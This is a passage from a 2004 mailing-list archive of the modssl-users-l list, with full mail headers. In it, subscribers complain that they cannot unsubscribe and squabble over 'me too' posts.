> The majordomo interface, while it is responsive, is apparently 
> non-functional.
> 
> I would ask that the managers/owner of the modssl-users list (or 
> modssl-users-l?) take some responsibility for the problems -( spam, 
> inability to get removed from list).
> Shut all the lists down, re-name them and ask interested folks to 
> re-subscribe.
> 
> Come on guys, fix this!
> Jeff
> 
> 


--=-603zHfuF+vaJ8thrVeL1--


From jester@panix.com  Wed Mar 31 18:34:57 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mail1.panix.com (mail1.panix.com [166.84.1.72])
	by master.modssl.org (Postfix) with ESMTP id 88CF7A8974
	for ; Wed, 31 Mar 2004 18:34:41 +0200 (CEST)
Received: from panix2.panix.com (panix2.panix.com [166.84.1.2])
	by mail1.panix.com (Postfix) with ESMTP id 5E8AE48961
	for ; Wed, 31 Mar 2004 11:34:34 -0500 (EST)
Received: (from jester@localhost)
	by panix2.panix.com (8.11.6p2-a/8.8.8/PanixN1.1) id i2VGYW425089
	for modssl-users-l@master.modssl.org; Wed, 31 Mar 2004 11:34:32 -0500 (EST)
Date: Wed, 31 Mar 2004 11:34:31 -0500
From: Jesse Sheidlower 
To: modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]
Message-ID: <20040331163431.GB24097@panix.com>
References: <1080750666.5529.2.camel@Fedora>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1080750666.5529.2.camel@Fedora>
User-Agent: Mutt/1.4.2.1i

On Wed, Mar 31, 2004 at 05:31:06PM +0100, Chris Covell wrote:
> I have the same story as everyone else that has posted today. If the
> list admin is not going to shut the list down, then please include me on
> the list of people that want to be removed.

And the same for me. Have tried to unsub using the Web site,
and also by sending e-mail to the majordomo server; neither
worked.

Jesse Sheidlower

From ihor@mindspring.net  Wed Mar 31 18:38:03 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from winger.mail.pas.earthlink.net (winger.mail.pas.earthlink.net [207.217.120.100])
	by master.modssl.org (Postfix) with ESMTP id 8C0E0A8939
	for ; Wed, 31 Mar 2004 18:37:48 +0200 (CEST)
Received: from reserved-role-dmzfront.fw.earthlink.net ([198.185.0.144] helo=DELIK)
	by winger.mail.pas.earthlink.net with smtp (Exim 3.36 #1)
	id 1B8iia-0007F2-00; Wed, 31 Mar 2004 08:37:32 -0800
Message-ID: <002e01c4173e$7ae75a50$20661e0a@DELIK>
Reply-To: "Ihor Bilyy" 
From: "Ihor Bilyy" 
To: "Jesse Sheidlower" ,
	
References: <1080750666.5529.2.camel@Fedora> <20040331163431.GB24097@panix.com>
Subject: Re: [Fwd: Re: Shut the list down]
Date: Wed, 31 Mar 2004 11:37:38 -0500
Organization: ELNK, hostingdev
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165

please all stop writing "ME TOO" messages !!!

----- Original Message ----- 
From: "Jesse Sheidlower" 
To: 
Sent: Wednesday, March 31, 2004 11:34 AM
Subject: Re: [Fwd: Re: Shut the list down]


> On Wed, Mar 31, 2004 at 05:31:06PM +0100, Chris Covell wrote:
> > I have the same story as everyone else that has posted today. If the
> > list admin is not going to shut the list down, then please include me on
> > the list of people that want to be removed.
>
> And the same for me. Have tried to unsub using the Web site,
> and also by sending e-mail to the majordomo server; neither
> worked.
>
> Jesse Sheidlower
>


From ste@smxy.org  Wed Mar 31 18:43:37 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from peter.smxy.org (smxy.org [64.32.179.41])
	by master.modssl.org (Postfix) with ESMTP id 15F25A8948
	for ; Wed, 31 Mar 2004 18:43:19 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by peter.smxy.org (Postfix) with ESMTP id EC727213E;
	Wed, 31 Mar 2004 11:43:13 -0500 (EST)
Received: from smxy.org ([127.0.0.1])
 by localhost (peter.smxy.org [127.0.0.1]) (amavisd-new, port 10025)
 with ESMTP id 56250-08; Wed, 31 Mar 2004 11:43:13 -0500 (EST)
Received: from smxy.org (bgp377940bgs.plnfld01.nj.comcast.net [68.36.5.198])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by peter.smxy.org (Postfix) with ESMTP id 7633F20B1;
	Wed, 31 Mar 2004 11:43:13 -0500 (EST)
Message-ID: <406AF51C.8000709@smxy.org>
Date: Wed, 31 Mar 2004 11:43:08 -0500
From: "Shaun T. Erickson" 
Reply-To: ste@smxy.org
User-Agent: Mozilla Thunderbird 0.5 (Windows/20040207)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Ihor Bilyy 
Cc: Jesse Sheidlower ,
	modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]
References: <1080750666.5529.2.camel@Fedora> <20040331163431.GB24097@panix.com> <002e01c4173e$7ae75a50$20661e0a@DELIK>
In-Reply-To: <002e01c4173e$7ae75a50$20661e0a@DELIK>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd-new at smxy.org

Ihor Bilyy wrote:
> please all stop writing "ME TOO" messages !!!

These are different from "me to" messages. These are people who have 
tried and failed to get removed from this list. They should not have to 
keep getting mail from a list the software said they were unsubscribed 
from. I don't blame them for complaining.

Fix the list.

	-ste

From jhallgren@ghweb.com  Wed Mar 31 18:44:58 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from conn.mc.mpls.visi.com (conn.mc.mpls.visi.com [208.42.156.2])
	by master.modssl.org (Postfix) with ESMTP id AC86EA8939
	for ; Wed, 31 Mar 2004 18:44:42 +0200 (CEST)
Received: from [10.1.100.217] (216-54-189-117.gen.twtelecom.net [216.54.189.117])
	(using TLSv1 with cipher RC4-SHA (128/128 bits))
	(No client certificate requested)
	by conn.mc.mpls.visi.com (Postfix) with ESMTP
	id AE10B85B8; Wed, 31 Mar 2004 10:44:37 -0600 (CST)
In-Reply-To: <002e01c4173e$7ae75a50$20661e0a@DELIK>
References: <1080750666.5529.2.camel@Fedora> <20040331163431.GB24097@panix.com> <002e01c4173e$7ae75a50$20661e0a@DELIK>
Mime-Version: 1.0 (Apple Message framework v613)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Message-Id: 
Content-Transfer-Encoding: 7bit
Cc:  
From: Jeff Hallgren 
Subject: Re: [Fwd: Re: Shut the list down]
Date: Wed, 31 Mar 2004 10:44:36 -0600
To: "Ihor Bilyy" 
X-Mailer: Apple Mail (2.613)

no way... Keep the messages coming.
The owners of this list are negligent and need to pay attention to the 
problems or shut the list down.
I suspect there is no one behind the curtain!
If anyone has contacts to the list admins please forward all this mail 
to them.
If you don't like it - TAKE ME OFF THE LIST.

By the way, just what is modssl-users-l as opposed to modssl-users?

On Mar 31, 2004, at 10:37 AM, Ihor Bilyy wrote:

> please all stop writing "ME TOO" messages !!!
>
> ----- Original Message -----
> From: "Jesse Sheidlower" 
> To: 
> Sent: Wednesday, March 31, 2004 11:34 AM
> Subject: Re: [Fwd: Re: Shut the list down]
>
>
>> On Wed, Mar 31, 2004 at 05:31:06PM +0100, Chris Covell wrote:
>>> I have the same story as everyone else that has posted today. If the
>>> list admin is not going to shut the list down, then please include 
>>> me on
>>> the list of people that want to be removed.
>>
>> And the same for me. Have tried to unsub using the Web site,
>> and also by sending e-mail to the majordomo server; neither
>> worked.
>>
>> Jesse Sheidlower
>>
>


From sorg@netcourrier.com  Wed Mar 31 18:47:26 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from netc-4v.grolier.fr (netc-4v.grolier.fr [194.158.97.228])
	by master.modssl.org (Postfix) with ESMTP id 49437A8948
	for ; Wed, 31 Mar 2004 18:47:10 +0200 (CEST)
Received: from netcourrier.com (netcourrier-3m.netcourrier.com [194.158.104.103])
	by netc-4v.grolier.fr (Postfix) with SMTP
	id 3DDA8F968; Wed, 31 Mar 2004 18:24:09 +0200 (CEST)
Received: from [80.170.31.106] by netcourrier-3m.netcourrier.com via html
	interface
From: =?iso-8859-1?Q?Timoth=E9e_GROS?= 
To: efischer@rsasecurity.com, jhallgren@ghweb.com,
	modssl-users-l@master.modssl.org
Subject: Re: RE: Shut the list down
Date: Wed, 31 Mar 2004 18:24:09 CEST
Mime-Version: 1.0
X-Mailer: Medianet/v2.0
Message-Id: 
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

idem


----Message d'origine----
>De: =22Fischer, Eric=22 
>A: =22'Jeff Hallgren'=22 ,
>Sujet: RE: Shut the list down
>Date: Wed, 31 Mar 2004 10:47:05 -0500
>
>I have also been unable to un-subscribe. This has been a problem for a
>while. =

>
>-----Original Message-----
>From: Jeff Hallgren =5Bmailto:jhallgren=40ghweb.com=5D =

>Sent: Wednesday, March 31, 2004 10:42 AM
>To: modssl-users-l=40master.modssl.org
>Subject: Shut the list down
>
>I've tried for weeks now to get off the modssl-users email list.
>The web site pages at www.modssl.org for subscribe/unsubscribe do not wor=
k.
>The majordomo interface, while it is responsive, is apparently
>non-functional.
>
>I would ask that the managers/owner of the modssl-users list (or
>modssl-users-l?) take some responsibility for the problems -( spam,
>inability to get removed from list).
>Shut all the lists down, re-name them and ask interested folks to
>re-subscribe.
>
>Come on guys, fix this=21
>Jeff
>
>

-------------------------------------------------------------
NetCourrier, votre bureau virtuel sur Internet : Mail, Agenda, Clubs, Tool=
bar...
Web/Wap : www.netcourrier.com
T=E9l=E9phone/Fax : 08 92 69 00 21 (0,34 =80 TTC/min)
Minitel: 3615 NETCOURRIER (0,16 =80 TTC/min)


From cabernethy@studentadvantage.com  Wed Mar 31 18:50:24 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from fed1mtao05.cox.net (fed1mtao05.cox.net [68.6.19.126])
	by master.modssl.org (Postfix) with ESMTP id 91191A8948
	for ; Wed, 31 Mar 2004 18:50:07 +0200 (CEST)
Received: from localhost.localdomain ([68.9.51.80]) by fed1mtao05.cox.net
          (InterMail vM.5.01.06.08 201-253-122-130-108-20031117) with ESMTP
          id <20040331165003.PENX2451.fed1mtao05.cox.net@localhost.localdomain>;
          Wed, 31 Mar 2004 11:50:03 -0500
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
	by localhost.localdomain (8.12.10/8.12.10) with ESMTP id i2VGwv6s007433;
	Wed, 31 Mar 2004 11:58:58 -0500
Received: (from cabernet@localhost)
	by localhost.localdomain (8.12.10/8.12.10/Submit) id i2VGwvC5007431;
	Wed, 31 Mar 2004 11:58:57 -0500
X-Authentication-Warning: localhost.localdomain: cabernet set sender to cabernethy@studentadvantage.com using -f
Subject: Re: [Fwd: Re: Shut the list down]
From: Chris Abernethy 
Cc: Chris Abernethy ,
	modssl 
In-Reply-To: <1080750666.5529.2.camel@Fedora>
References: <1080750666.5529.2.camel@Fedora>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Message-Id: <1080752337.6793.30.camel@localhost.localdomain>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.5 (1.4.5-1) 
Date: Wed, 31 Mar 2004 11:58:57 -0500

I am in the same boat... normal unsub procedure is not working.

--Chris

On Wed, 2004-03-31 at 11:31, Chris Covell wrote:
> I have the same story as everyone else that has posted today. If the
> list admin is not going to shut the list down, then please include me on
> the list of people that want to be removed.
> 
> Chris...
> 
> 
> ______________________________________________________________________
> From: mike.collins@tds.net
> To: modssl-users-l@master.modssl.org
> Cc: majordomo@modssl.org
> Subject: Re: Shut the list down
> Date: Wed, 31 Mar 2004 10:25:12 -0600
> 
> I have also attempted to remove myself from this list several times in recent months to no avail.  I have also sent email requests specifically to the list administrator which was disregarded.  I neglected to send my unsubscribe requests to the modssl-user list because it was somewhat outside the scope of appropriate subject matter for the list.  But as I see others have similar issues with the inability to subscribe, spam, etc, I am requesting again to be manually removed from this list.
> 
> Thank you.
> 
> > 
> > From: Jeff Hallgren 
> > Date: 2004/03/31 Wed AM 09:42:08 CST
> > To: modssl-users-l@master.modssl.org
> > Subject: Shut the list down
> > 
> > I've tried for weeks now to get off the modssl-users email list.
> > The web site pages at www.modssl.org for subscribe/unsubscribe do not 
> > work.
> > The majordomo interface, while it is responsive, is apparently 
> > non-functional.
> > 
> > I would ask that the managers/owner of the modssl-users list (or 
> > modssl-users-l?) take some responsibility for the problems -( spam, 
> > inability to get removed from list).
> > Shut all the lists down, re-name them and ask interested folks to 
> > re-subscribe.
> > 
> > Come on guys, fix this!
> > Jeff
> > 
> > 
> 

From jfeise@ics.uci.edu  Wed Mar 31 19:06:15 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from pv105234.reshsg.uci.edu (pv105234.reshsg.uci.edu [128.195.105.234])
	by master.modssl.org (Postfix) with SMTP id 06A93A8A51
	for ; Wed, 31 Mar 2004 19:05:59 +0200 (CEST)
Received: (qmail 6371 invoked from network); 31 Mar 2004 17:05:53 -0000
Received: from unknown (HELO ics.uci.edu) (192.168.1.189)
  by pv105234.reshsg.uci.edu with SMTP; 31 Mar 2004 17:05:53 -0000
Message-ID: <406AFA6F.7010802@ics.uci.edu>
Date: Wed, 31 Mar 2004 09:05:51 -0800
From: Joachim Feise 
Reply-To: jfeise@ics.uci.edu
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7b) Gecko/20040316
X-Accept-Language: en, de
MIME-Version: 1.0
To: modssl 
Subject: Re: [Fwd: Re: Shut the list down]
References: <1080750666.5529.2.camel@Fedora> <1080752337.6793.30.camel@localhost.localdomain>
In-Reply-To: <1080752337.6793.30.camel@localhost.localdomain>
X-Enigmail-Version: 0.83.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Chris Abernethy said  on 3/31/2004 8:58:

> I am in the same boat... normal unsub procedure is not working.

Can you PLEASE stop the me-too posts?
This is worse than the spam!

-Joe

From jfeise@ics.uci.edu  Wed Mar 31 19:22:34 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from pv105234.reshsg.uci.edu (pv105234.reshsg.uci.edu [128.195.105.234])
	by master.modssl.org (Postfix) with SMTP id 35257A8948
	for ; Wed, 31 Mar 2004 19:22:18 +0200 (CEST)
Received: (qmail 6747 invoked from network); 31 Mar 2004 17:22:13 -0000
Received: from unknown (HELO ics.uci.edu) (192.168.1.189)
  by pv105234.reshsg.uci.edu with SMTP; 31 Mar 2004 17:22:13 -0000
Message-ID: <406AFE44.5020604@ics.uci.edu>
Date: Wed, 31 Mar 2004 09:22:12 -0800
From: Joachim Feise 
Reply-To: jfeise@ics.uci.edu
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7b) Gecko/20040316
X-Accept-Language: en, de
MIME-Version: 1.0
To: modssl 
Subject: Re: Please confirm (conf#2e7dc034f27f011b0c6cc7b8f01bb801)
References: <20040331170736.11355.qmail@electricrain.com>
In-Reply-To: <20040331170736.11355.qmail@electricrain.com>
X-Enigmail-Version: 0.83.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Dan Sully said  on 3/31/2004 9:07:

> << IMPORTANT INFORMATION! >>
> 
> This is an automated message. 
> 
> The message you sent (attached below) requires confirmation
> before it can be delivered. To confirm that you sent the
> message below, just hit the "R"eply button and send this
> message back (you don't need to edit anything). Once this is
> done, no more confirmations will be necessary.
>
> This email account is protected by:
> Active Spam Killer (ASK) V2.5.0 - (C) 2001-2002 by Marco Paganini
> For more information visit http://www.paganini.net/ask
>

And then there are the morons who use email-confirms on mailing
lists...
Until such morons learn how to use whitelists, they have a spot
in my killfile.

-Joe

From praise@praisenet.darktech.org  Wed Mar 31 19:23:10 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from praisenet.darktech.org (host107-141.pool8251.interbusiness.it [82.51.141.107])
	by master.modssl.org (Postfix) with ESMTP id 17C35A8A5F
	for ; Wed, 31 Mar 2004 19:22:50 +0200 (CEST)
Received: by praisenet.darktech.org (Praisenet Mail 1.0 (i386), from userid 65534)
	id 0C1162E581E; Wed, 31 Mar 2004 19:22:39 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by praisenet.darktech.org (Praisenet Mail 1.0 (i386)) with ESMTP id 5F8F92E5824
	for ; Wed, 31 Mar 2004 19:22:36 +0200 (CEST)
Received: from doom9.praisenet (unknown [192.168.1.7])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by praisenet.darktech.org (Praisenet Mail 1.0 (i386)) with ESMTP id BF8CE2E581E
	for ; Wed, 31 Mar 2004 19:22:32 +0200 (CEST)
From: Tazio Ceri 
Organization: Praisenet
To: modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]
Date: Wed, 31 Mar 2004 19:22:35 +0200
User-Agent: KMail/1.5.4
References: <1080750666.5529.2.camel@Fedora> <1080752337.6793.30.camel@localhost.localdomain> <406AFA6F.7010802@ics.uci.edu>
In-Reply-To: <406AFA6F.7010802@ics.uci.edu>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200403311922.35778@prules>
X-Virus-Scanned: by AMaViS 0.3.12pre5
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on praisenet.praisenet
X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=ham version=2.63
X-Spam-Level: 

Alle 19:05, mercoled=EC 31 marzo 2004, Joachim Feise ha scritto:
> Chris Abernethy said  on 3/31/2004 8:58:
> > I am in the same boat... normal unsub procedure is not working.
>
> Can you PLEASE stop the me-too posts?
> This is worse than the spam!
>
> -Joe

I want to be unsubscribed too.
Yes, this is a me too message. How would you think I should do, AS THE COMM=
ON=20
UNSUBSCRIBING PROCEDURE DOES NOT WORK?
Being forcefully subscribed to this mailing list, THAT is worse than SPAM.
Make sure your fingers are correctly linked to your brain before posting=20
something like this.

=2D-=20
Botta e risposta peripatetico:
Discepolo:"Un metodo sicuro per conquistare il mondo?"
Maestro:"Crea un worm che giri sulla testa della gente."


From dufresne@sysinfo.com  Wed Mar 31 19:25:36 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 64BCEA8A55
	for ; Wed, 31 Mar 2004 19:25:26 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA11950;
	Wed, 31 Mar 2004 12:25:20 -0500
Date: Wed, 31 Mar 2004 12:25:19 -0500 (EST)
From: "R. DuFresne" 
To: Jesse Sheidlower 
Cc: modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]
In-Reply-To: <20040331163431.GB24097@panix.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


if nothing else folks can filter and point all traffic to /dev/null or
trash, though this is less preferred then a working majordomo.

Thanks,

Ron DuFresne

On Wed, 31 Mar 2004, Jesse Sheidlower wrote:

> On Wed, Mar 31, 2004 at 05:31:06PM +0100, Chris Covell wrote:
> > I have the same story as everyone else that has posted today. If the
> > list admin is not going to shut the list down, then please include me on
> > the list of people that want to be removed.
> 
> And the same for me. Have tried to unsub using the Web site,
> and also by sending e-mail to the majordomo server; neither
> worked.
> 
> Jesse Sheidlower
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!


From efischer@rsasecurity.com  Wed Mar 31 19:28:38 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from vulcan.rsasecurity.com (vulcan.rsasecurity.com [204.167.114.130])
	by master.modssl.org (Postfix) with ESMTP id 6B720A8974
	for ; Wed, 31 Mar 2004 19:28:37 +0200 (CEST)
Received: from ebola.securitydynamics.com by vulcan.rsasecurity.com
          via smtpd (for [195.27.176.156]) with ESMTP; Wed, 31 Mar 2004 12:28:33 -0500
Received: from sdtihq24.securid.com (localhost [127.0.0.1])
	by ebola.securitydynamics.com (8.12.10/NULL) with ESMTP id i2VHS03l000587;
	Wed, 31 Mar 2004 12:28:01 -0500 (EST)
Received: from exna00.securitydynamics.com (exna00.securitydynamics.com [10.100.8.217])
	by sdtihq24.securid.com (8.12.10/8.12.9) with ESMTP id i2VHSV05018073;
	Wed, 31 Mar 2004 12:28:31 -0500 (EST)
Received: by exna00.securitydynamics.com with Internet Mail Service (5.5.2657.72)
	id ; Wed, 31 Mar 2004 12:28:30 -0500
Message-ID: 
From: "Fischer, Eric" 
To: "'R. DuFresne'" ,
	"'Jesse Sheidlower'" 
Cc: "'modssl-users-l@master.modssl.org'" 
Subject: RE: [Fwd: Re: Shut the list down]
Date: Wed, 31 Mar 2004 12:27:47 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain

I have been able to "re-direct" the list traffic to my deleted items for
about a year. This is just adding to more traffic on an already busy mail
server however. 

The best solution is to get in touch with the admin and ask them to correct
whatever is going wrong with the list.

Thanks,

Eric


-----Original Message-----
From: R. DuFresne [mailto:dufresne@sysinfo.com] 
Sent: Wednesday, March 31, 2004 12:25 PM
To: Jesse Sheidlower
Cc: modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]


if nothing else folks can filter and point all traffic to /dev/null or
trash, though this is less preferred then a working majordomo.

Thanks,

Ron DuFresne

On Wed, 31 Mar 2004, Jesse Sheidlower wrote:

> On Wed, Mar 31, 2004 at 05:31:06PM +0100, Chris Covell wrote:
> > I have the same story as everyone else that has posted today. If the 
> > list admin is not going to shut the list down, then please include 
> > me on the list of people that want to be removed.
> 
> And the same for me. Have tried to unsub using the Web site, and also 
> by sending e-mail to the majordomo server; neither worked.
> 
> Jesse Sheidlower
> 

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

From jfeise@ics.uci.edu  Wed Mar 31 19:38:04 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from pv105234.reshsg.uci.edu (pv105234.reshsg.uci.edu [128.195.105.234])
	by master.modssl.org (Postfix) with SMTP id 03FEEA8A4D
	for ; Wed, 31 Mar 2004 19:37:48 +0200 (CEST)
Received: (qmail 7043 invoked from network); 31 Mar 2004 17:37:27 -0000
Received: from unknown (HELO ics.uci.edu) (192.168.1.189)
  by pv105234.reshsg.uci.edu with SMTP; 31 Mar 2004 17:37:27 -0000
Message-ID: <406B01CD.5070207@ics.uci.edu>
Date: Wed, 31 Mar 2004 09:37:17 -0800
From: Joachim Feise 
Reply-To: jfeise@ics.uci.edu
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7b) Gecko/20040316
X-Accept-Language: en, de
MIME-Version: 1.0
To: modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]
References: <1080750666.5529.2.camel@Fedora> <1080752337.6793.30.camel@localhost.localdomain> <406AFA6F.7010802@ics.uci.edu> <200403311922.35778@prules>
In-Reply-To: <200403311922.35778@prules>
X-Enigmail-Version: 0.83.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

Tazio Ceri said  on 3/31/2004 9:22:

> Alle 19:05, mercoledì 31 marzo 2004, Joachim Feise ha scritto:
> 
>>Chris Abernethy said  on 3/31/2004 8:58:
>>
>>>I am in the same boat... normal unsub procedure is not working.
>>
>>Can you PLEASE stop the me-too posts?
>>This is worse than the spam!
>>
>>-Joe
> 
> 
> I want to be unsubscribed too.
> Yes, this is a me too message. How would you think I should do, AS THE COMMON 
> UNSUBSCRIBING PROCEDURE DOES NOT WORK?

And posting to the list doesn't help you with that, either.
SO STOP WASTING BANDWIDTH! AND STOP SPAMMING!
The next "me-too" post is reported to SpamCop!

-Joe

From villegas@math.gatech.edu  Wed Mar 31 19:38:08 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from math.gatech.edu (math.gatech.edu [130.207.146.50])
	by master.modssl.org (Postfix) with ESMTP id B70C4A8A55
	for ; Wed, 31 Mar 2004 19:37:52 +0200 (CEST)
Received: from hemi.math.gatech.edu (hemi.math.gatech.edu [130.207.146.192])
	by math.gatech.edu (8.12.10/8.12.10) with ESMTP id i2VHbjjn002470;
	Wed, 31 Mar 2004 12:37:45 -0500 (EST)
Received: by hemi.math.gatech.edu (Postfix, from userid 383)
	id 9E4DF844E0; Wed, 31 Mar 2004 12:37:44 -0500 (EST)
Date: Wed, 31 Mar 2004 12:37:44 -0500
From: Carlos Villegas 
To: Ihor Bilyy 
Cc: modssl-users-l@master.modssl.org
Subject: Re: unsubscribe modssl-users efischer@rsasecurity.com
Message-ID: <20040331173744.GU1386@hemi.math.gatech.edu>
References:  <001b01c4173c$d3ee6870$20661e0a@DELIK>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <001b01c4173c$d3ee6870$20661e0a@DELIK>
User-Agent: Mutt/1.4.1i
X-GTMath-Relay: 130.207.146.192
X-Spam-Status: SpamAssassin not applied to messages from Local Relay
X-Scanned-By: MIMEDefang 2.37

On Wed, Mar 31, 2004 at 11:25:48AM -0500, Ihor Bilyy wrote:
> could you please to each other directly ?!!

NO!!!! He sent that to the list, which clearly indicated that he
was possibly having trouble to unsubscribe because of a mistake
on the destination email address and not by the list's fault.
Others could be making that mistake if the unsubscribe
information is not stated clearly in the webpage (I don't
remember, and won't waste my time checking it). So both messages
(mine and his reply to it) were relevant to other list members and list
owners... Use a threaded mail reader :)

Carlos


From praise@praisenet.darktech.org  Wed Mar 31 19:41:50 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from praisenet.darktech.org (host107-141.pool8251.interbusiness.it [82.51.141.107])
	by master.modssl.org (Postfix) with ESMTP id F3A28A8948
	for ; Wed, 31 Mar 2004 19:41:33 +0200 (CEST)
Received: by praisenet.darktech.org (Praisenet Mail 1.0 (i386), from userid 65534)
	id 7FC0F2E581E; Wed, 31 Mar 2004 19:41:19 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by praisenet.darktech.org (Praisenet Mail 1.0 (i386)) with ESMTP id 549AE2E5824
	for ; Wed, 31 Mar 2004 19:41:18 +0200 (CEST)
Received: from doom9.praisenet (unknown [192.168.1.7])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by praisenet.darktech.org (Praisenet Mail 1.0 (i386)) with ESMTP id 28A612E581E
	for ; Wed, 31 Mar 2004 19:41:15 +0200 (CEST)
From: Tazio Ceri 
Organization: Praisenet
To: modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]
Date: Wed, 31 Mar 2004 19:41:17 +0200
User-Agent: KMail/1.5.4
References: <1080750666.5529.2.camel@Fedora> <200403311922.35778@prules> <406B01CD.5070207@ics.uci.edu>
In-Reply-To: <406B01CD.5070207@ics.uci.edu>
MIME-Version: 1.0
Content-Type: Text/Plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Description: clearsigned data
Content-Disposition: inline
Message-Id: <200403311941.18590@prules>
X-Virus-Scanned: by AMaViS 0.3.12pre5
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on praisenet.praisenet
X-Spam-Status: No, hits=0.3 required=5.0 tests=UPPERCASE_25_50 autolearn=no 
	version=2.63
X-Spam-Level: 

=2D----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Alle 19:37, mercoled=EC 31 marzo 2004, Joachim Feise ha scritto:
> Tazio Ceri said  on 3/31/2004 9:22:
> > Alle 19:05, mercoled=EC 31 marzo 2004, Joachim Feise ha scritto:
> >>Chris Abernethy said  on 3/31/2004 8:58:
> >>>I am in the same boat... normal unsub procedure is not working.
> >>
> >>Can you PLEASE stop the me-too posts?
> >>This is worse than the spam!
> >>
> >>-Joe
> >
